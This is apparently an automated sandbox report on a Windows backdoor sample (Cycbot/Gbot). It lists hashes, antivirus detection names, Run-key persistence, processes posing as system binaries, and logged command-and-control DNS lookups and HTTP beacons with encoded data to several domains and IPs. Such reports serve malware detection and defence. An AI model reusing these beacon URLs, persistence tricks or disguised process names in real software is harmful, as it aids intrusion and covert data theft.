Analysis Date: 2014-08-03 12:56:51
MD5: ef7cd85f9eb3f2c3cf120d590620fc04
SHA1: 2da9bc84448a8578384f354d30cf0750148170ee

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: e869ae33c56e135910eb24e91c7f05e2 sha1: 5c5f1372154b1404a794fafa643952db4ba2cc87 size: 96768
Section: .rdata md5: e2a79d3c028af5785ab5890e9a296c6c sha1: 20a081c7dcecc2d8335030665e382e3ef5462ff0 size: 1536
Section: .data md5: a9d68e2ccd9ede76a2af909fe75f6018 sha1: 3d741a2cd2e315bc559b11503b3468387b3f96bf size: 78848
Section: .reloc md5: 62a3d4a22f1a0a936c08367b84a246a3 sha1: 42a679932c3cf7c3cf3da7afec07e6fff2c7ab57 size: 1024
Timestamp: 2005-09-23 00:22:38
PEhash: 0ad5d39358190d04841421773a5f0d760b12c067
IMPhash: 51f933d4af4f9676403aec3807efdb0e
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Backdoor.Gbot.pge
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV CA (E-Trust Ino): Win32/FraudSecurity.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-575
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Cycbot.AD
AV Fortinet: W32/FakeAV.ISS!tr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Win32.SuspectCrc
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.pge
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.s
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Norman: win32/Cycbot.EI
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Trojan
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS: resetmymemory.com
Winsock DNS: 127.0.0.1
Winsock DNS: fastblogportal.com
Winsock DNS: crazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: crazyleafdesign.com, Type: A, 173.249.152.55
DNS: zonedg.com, Type: A, 208.73.210.218
DNS: zonedg.com, Type: A, 208.73.211.165
DNS: zonedg.com, Type: A, 208.73.211.175
DNS: zonedg.com, Type: A, 208.73.210.215
DNS: zonedg.com, Type: A, 208.73.210.218
DNS: zonedg.com, Type: A, 208.73.211.165
DNS: zonedg.com, Type: A, 208.73.211.175
DNS: zonedg.com, Type: A, 208.73.210.215
DNS: resetmymemory.com, Type: A, 192.155.89.148
DNS: fastblogportal.com, Type: A
HTTP GET: http://crazyleafdesign.com/blog/images/share/stumble.png?v48=1&tq=gKZEtzy%2BkSVWpehlhG5uUDDMBnZHiTnlwrUCqHkjTrcI66oA9m7BQr1479Jei%2BfMJ13QX8QAa4IOMOEdVUSTQGNwS7BepXQJhBVwNYG9EhfRpE9kv5HMd9UbPJJu%2BECDB40LTDQBWPq5YDa8V7iT%2B2Si5Pp3pv9jvAdJxl00aowui0kOPErR7bPsZ2phz%2BJR1DYRvm7%2FXV7XN9jBj6qtdTSi1kQTjbt0bnsLWutKV%2FRcjHf%2BbHnQrFlsXCn2Bty0nWjgtlS8dM7ms6gs%2FSphtbOxH52xVch6j3D480x%2B2mBdv%2B
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP GET: http://resetmymemory.com/blog/images/3521.jpg?v63=70&tq=gKZEtzyMv5rJqxG1J42pzMffBvQs0ejbwvgS917W65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 173.249.152.55:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.210.218:80
Flows TCP: 192.168.1.1:1034 ➝ 208.73.210.218:80
Flows TCP: 192.168.1.1:1035 ➝ 192.155.89.148:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.210.218:80
Flows TCP: 192.168.1.1:1037 ➝ 208.73.210.218:80

Raw Pcap

Strings